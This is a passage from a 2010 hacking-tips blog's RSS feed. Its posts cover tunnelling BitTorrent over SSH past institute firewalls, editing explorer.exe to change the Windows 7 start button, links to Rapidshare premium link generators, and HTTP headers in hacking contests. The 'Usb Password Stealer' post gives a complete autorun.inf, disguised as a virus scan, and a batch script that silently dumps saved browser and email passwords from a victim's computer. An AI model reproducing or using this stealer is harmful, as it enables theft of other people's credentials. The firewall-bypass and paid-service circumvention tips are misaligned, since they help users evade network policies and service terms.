		<description><![CDATA[Dedicated to my juniors who ask me many times that &#8220;How to run Torrent behind proxy n firewall??&#8221; or &#8220;Sir please unblock Torrent over institue lan.&#8221; Torrents is preferred means of downloads. Use of BitTorrent is not possible on some networks (e.g. institute or office lan). In this post am going to tell you a [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=105&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><strong>Dedicated to my juniors who ask me many times that &#8220;How to run Torrent behind proxy n firewall??&#8221; or &#8220;Sir please unblock Torrent over institue lan.&#8221;</strong></p>
<p>Torrents is preferred means of downloads. Use of BitTorrent is not possible on some networks (e.g. institute or office lan). In this post am going to tell you a easy solution to overcome this problem. By using a secure connection (SSH), you can bypass almost every firewall. Linux or a UNIX-based OS terminal supports SSH. For Windows, you have to download SSH clients. There are may SSH clients, but <strong>PuTTY</strong> is (probably) the best and certainly the most popular. For this hack you need a SSH account. You can try one of these free shell providers from this <a href="http://www.dmoz.org/Computers/Internet/Access_Providers/Unix_Shell_Providers/Free_Shells/">list</a> .  So here it goes&#8230;.</p>
<p><strong>Steps:</strong></p>
<p>1. Run putty and In the address box, put the hostname or IP address of the server you have an SSH account on. Make sure the SSH radio button or check-box is ticked, and be sure you’re using port 22.<br />
2. In the menu, click on <strong>Proxy</strong> tab under <strong>Connections</strong> and put your proxy settings there.<br />
3. In the menu, click on <strong>SSH</strong> and select <strong>enable compression</strong>. this will compress the traffic thru your SSH tunnel, which not only provides a modest improvement in transfer rates, but has some minor security benefits as well. Set your preferred protocol to &#8220;2&#8243;, or &#8220;2 only&#8221;.<br />
4. Click on the <strong>tunnels</strong> menu under SSH. At the bottom, select the <strong>dynamic</strong> button, and enter a source port. Use any port (greater than 1024 like 4567). Click the “add” button.<br />
5. Go back to the <strong>session</strong> tab in the menu, enter in a title for this proxy, and click save.<br />
6. Now Configure your BitTorrent client. In uTorrent go to <strong>Options &gt; Preferences &gt; Connection</strong>. Enter your port number (which u use earlier like 4567), socks 4 or 5 as type, and localhost in the proxy field. Socks5 is preferable to version four, and supported by our SSH tunnel, so select it. Click OK, and you should now be proxying thru the server with the SSH account.</p>
<p>You’re done, restart your BitTorrent client and you’re ready to go. BitTorrent over SSH tends to be a bit slower than your normal connection, but it’s a great solution when BitTorrent connections are blocked.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/z3roday.wordpress.com/105/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/z3roday.wordpress.com/105/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/z3roday.wordpress.com/105/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/z3roday.wordpress.com/105/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/z3roday.wordpress.com/105/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/z3roday.wordpress.com/105/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/z3roday.wordpress.com/105/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/z3roday.wordpress.com/105/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/z3roday.wordpress.com/105/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/z3roday.wordpress.com/105/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/z3roday.wordpress.com/105/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/z3roday.wordpress.com/105/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/z3roday.wordpress.com/105/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/z3roday.wordpress.com/105/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=105&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://z3roday.wordpress.com/2010/06/27/run-torrent-behind-proxy-and-firewall/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/bdbae9c0f29973780386f48c8df00aed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">achieveriiitm</media:title>
		</media:content>
	</item>
		<item>
		<title>Customize start menu button: Windows 7</title>
		<link>http://z3roday.wordpress.com/2010/06/25/customize-start-menu-button-windows-7/</link>
		<comments>http://z3roday.wordpress.com/2010/06/25/customize-start-menu-button-windows-7/#comments</comments>
		<pubDate>Fri, 25 Jun 2010 11:07:24 +0000</pubDate>
		<dc:creator>Arpit Tripathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://z3roday.wordpress.com/?p=103</guid>
		<description><![CDATA[Have you ever wondered how to customize the start menu button in Windows 7? Well it is possible to spice up your copy of Windows 7 by giving a new look to the start menu button. In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=103&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Have you ever wondered how to customize the start menu button in Windows 7? Well it is possible to spice up your copy of Windows 7 by giving a new look to the start menu button. In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a binary editor. <strong>Resource HackerTM</strong> is a freeware utility and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP, Vista and Windows7 operating systems. </p>
<p><strong>Requirements </strong></p>
<p>1. Resource Hacker: A Binary File Editor<br />
2. Custom Start Menu Images: You nees three images that must be of the size 54×162 with a .bmp extension.</p>
<p>1st Image &#8211; For idle state<br />
2nd Image &#8211; For mouse over<br />
3rd Image &#8211; When button is clicked</p>
<p><strong>Process: </strong></p>
<p>1. Run Resource Hacker Editor.<br />
2. Go to File menu and Open file “explorer.exe” into the Resource Hacker.<br />
3. Go to Bitmap branch, expand 6801 option, right-click on 1033 and select Replace Resource option.<br />
4. A new window appears. Click on Open file with new bitmap button.<br />
5. Navigate to the customized (.bmp) image, open it and click on Replace button.<br />
6.  Repeat steps 3 to 5 above for the options 6805 and 6809 as well.<br />
7. Now save the file. Resource Hacker will automatically create a backup file called explorer_original.exe so that you can restore it in the future if needed. Restart your computer and have fun.</p>
<p>Download Resource Hacker Tool from <a href="http://www.angusj.com/resourcehacker/">http://www.angusj.com/resourcehacker/</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/z3roday.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/z3roday.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/z3roday.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/z3roday.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/z3roday.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/z3roday.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/z3roday.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/z3roday.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/z3roday.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/z3roday.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/z3roday.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/z3roday.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/z3roday.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/z3roday.wordpress.com/103/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=103&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://z3roday.wordpress.com/2010/06/25/customize-start-menu-button-windows-7/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/bdbae9c0f29973780386f48c8df00aed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">achieveriiitm</media:title>
		</media:content>
	</item>
		<item>
		<title>Usb Password Stealer</title>
		<link>http://z3roday.wordpress.com/2010/06/23/usb-password-stealer/</link>
		<comments>http://z3roday.wordpress.com/2010/06/23/usb-password-stealer/#comments</comments>
		<pubDate>Wed, 23 Jun 2010 04:11:48 +0000</pubDate>
		<dc:creator>Arpit Tripathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://z3roday.wordpress.com/?p=101</guid>
		<description><![CDATA[Many people save their passwords in their Browser and windows. As we know that there are lots of tools available on internet to recover Saved passwords, Thus one can easily run those software at victim&#8217;s computer and get their&#8217;s passwords. With the help of USB Passwords Stealer one can easily steal that saved passwords from [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=101&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Many people save their passwords in their Browser and windows. As we know that there are lots of tools available on internet to recover Saved passwords, Thus one can easily run those software at victim&#8217;s computer and get their&#8217;s passwords. With the help of <strong>USB Passwords Stealer</strong> one can easily steal that saved passwords from victim&#8217;s computer.</p>
<p><strong>Requirements:</strong></p>
<p><strong>Password recovery software:</strong></p>
<p>1. <strong>Mail PassView</strong> &#8211; Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc<br />
2. <strong>IE Passview</strong> &#8211; IE passview is a small program that helps us view stored passwords in Internet explorer.<br />
3. <strong>Protected storage pass viewer(PSPV)</strong> &#8211;  Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.<br />
4. <strong>Password Fox </strong>- Password fox is a small program used to view Stored passwords in Mozilla Firefox.</p>
<p><strong>Steps:</strong></p>
<p>1. Download all these tools and copy their exe files (mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe) into your USB Drive.</p>
<p>2. Open notepad and write the following command into it<br />
<strong>[autorun]<br />
open=launch.bat<br />
ACTION= Perform a Virus Scan</strong><br />
save this file as autorun.inf and copy it into your USB drive.</p>
<p>3. Open another notepad and write the following command into  it.<br />
<strong>@echo off<br />
start mailpv.exe /stext mailpv.txt<br />
start iepv.exe /stext iepv.txt<br />
start pspv.exe /stext pspv.txt<br />
start passwordfox.exe /stext passwordfox.txt</strong><br />
save this file as launch.bat and copy it into your USB drive.</p>
<p>4. Its done now insert it in victims computer and this will save password in .txt files for you.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/z3roday.wordpress.com/101/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/z3roday.wordpress.com/101/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/z3roday.wordpress.com/101/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/z3roday.wordpress.com/101/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/z3roday.wordpress.com/101/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/z3roday.wordpress.com/101/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/z3roday.wordpress.com/101/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/z3roday.wordpress.com/101/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/z3roday.wordpress.com/101/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/z3roday.wordpress.com/101/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/z3roday.wordpress.com/101/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/z3roday.wordpress.com/101/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/z3roday.wordpress.com/101/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/z3roday.wordpress.com/101/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=101&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://z3roday.wordpress.com/2010/06/23/usb-password-stealer/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/bdbae9c0f29973780386f48c8df00aed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">achieveriiitm</media:title>
		</media:content>
	</item>
		<item>
		<title>Premium Link Generator</title>
		<link>http://z3roday.wordpress.com/2010/06/22/premium-link-generator/</link>
		<comments>http://z3roday.wordpress.com/2010/06/22/premium-link-generator/#comments</comments>
		<pubDate>Tue, 22 Jun 2010 02:52:55 +0000</pubDate>
		<dc:creator>Arpit Tripathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://z3roday.wordpress.com/?p=99</guid>
		<description><![CDATA[I think all of us are regular user of Rapidshare and Megauplaod ,famous file sharing websites. Everytime when we want to download we have to wait for certain amount of time untill the download link appears. In case of Rapidshare, if your ip is already downloading some files from their server then you have to [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=99&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>I think all of us are regular user of Rapidshare and Megauplaod ,famous file sharing websites. Everytime when we want to download we have to wait for certain amount of time untill the download link appears. In case of Rapidshare, if your ip is already downloading some files from their server then you have to wait for the time period untill that download finished. Thus you might want to get yourself a premium account to avoid waiting every time you download files from it. Unfortunately, we don&#8217;t have money or don&#8217;t have will to buy premium account. Specially kids and teenagers who don’t own credit cards are not able to purchase a premium account.</p>
<p>Thus here are some link that genrate premium account for you so that you can download files easily.</p>
<p><a href="http://rapid8.com/">http://rapid8.com/</a><br />
<a href="http://www.rapidtime.net/">http://www.rapidtime.net/</a><br />
<a href="http://rapidshare-premium-link-generator.com/">http://rapidshare-premium-link-generator.com/</a><br />
<a href="http://premiumrapidshare.net/rapidshare.php">http://premiumrapidshare.net/rapidshare.php</a><br />
<a href="http://www.youleech.net/">http://www.youleech.net/</a><br />
<a href="http://www.hellorapid.com/public/index.php">http://www.hellorapid.com/public/index.php</a></p>
<p>To see how Rapidshare, Megaupload Premium Link  Generator works visit <a href="http://www.easyadsenseguide.com/videos/rapidshare-megaupload-premium-link-generator-tutorial-works-2010">link</a></p>
<p>If you have a Rapidshare premium account, you can also set up a generator for others using the source code provided on internet. I’m not sure if it’s legal though, so use at your own risk.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/z3roday.wordpress.com/99/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/z3roday.wordpress.com/99/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/z3roday.wordpress.com/99/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/z3roday.wordpress.com/99/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/z3roday.wordpress.com/99/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/z3roday.wordpress.com/99/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/z3roday.wordpress.com/99/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/z3roday.wordpress.com/99/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/z3roday.wordpress.com/99/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/z3roday.wordpress.com/99/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/z3roday.wordpress.com/99/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/z3roday.wordpress.com/99/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/z3roday.wordpress.com/99/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/z3roday.wordpress.com/99/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=99&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://z3roday.wordpress.com/2010/06/22/premium-link-generator/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/bdbae9c0f29973780386f48c8df00aed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">achieveriiitm</media:title>
		</media:content>
	</item>
		<item>
		<title>HTTP Headers</title>
		<link>http://z3roday.wordpress.com/2010/06/20/http-headers/</link>
		<comments>http://z3roday.wordpress.com/2010/06/20/http-headers/#comments</comments>
		<pubDate>Sun, 20 Jun 2010 03:02:23 +0000</pubDate>
		<dc:creator>Arpit Tripathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://z3roday.wordpress.com/?p=96</guid>
		<description><![CDATA[In HTTP protocol, client(also referred as a user agent) submits HTTP requests to the server by sending messages to it. The server sends messages back to the client in HTTP response. Both HTTP requests and HTTP responses use headers to send information about the HTTP message. A header is a series of lines, with each [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=96&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>In HTTP protocol, client(also referred as a user agent) submits HTTP requests to the server by sending messages to it. The server sends messages back to the client in HTTP response. Both HTTP requests and HTTP responses use headers to send information about the HTTP message. A header is a series of lines, with each line containing a name followed by a colon and a space, and then a value. The fields can be arranged in any order. Some header fields are used in both request and response headers, while others are appropriate only for either a request or a response.</p>
<p>Many request header fields will allow the client to specify several acceptable options in the value part and, in some cases, even rank each option&#8217;s preference. Multiple items are separated using a comma. For example, a client could send a request header that includes &#8220;<strong>Content-Encoding: gzip, compress,</strong>&#8221; indicating it would accept either type of compression. If the server uses gzip encoding for the response body, its response header would include &#8220;<strong>Content-Encoding: gzip</strong>&#8220;. One can add his own field in HTTP headers so that it contains some value specified by user. Some fields can occur more than once in a single header. For example, a header can have multiple &#8220;Warning&#8221; fields.</p>
<p>In most the the hacking contest you will find atleast one question on HTTP headers. Information can be hidden in them. To clear that level you have to see and edit the HTTP headers fields. There are lots of softwares/addons available on the net that make it possible to see and edit HTTP header.</p>
<p><strong>Some firefox addon: Firebug, Add and Modify Headers, Live HTTP headers</strong></p>
<p>For more information regarding HTTP headers fields and their values please visit <a href="http://en.wikipedia.org/wiki/HTTP">http://en.wikipedia.org/wiki/HTTP</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/z3roday.wordpress.com/96/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/z3roday.wordpress.com/96/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/z3roday.wordpress.com/96/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/z3roday.wordpress.com/96/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/z3roday.wordpress.com/96/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/z3roday.wordpress.com/96/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/z3roday.wordpress.com/96/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/z3roday.wordpress.com/96/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/z3roday.wordpress.com/96/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/z3roday.wordpress.com/96/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/z3roday.wordpress.com/96/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/z3roday.wordpress.com/96/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/z3roday.wordpress.com/96/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/z3roday.wordpress.com/96/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=96&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://z3roday.wordpress.com/2010/06/20/http-headers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/bdbae9c0f29973780386f48c8df00aed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">achieveriiitm</media:title>
		</media:content>
	</item>
	</channel>
</rss>
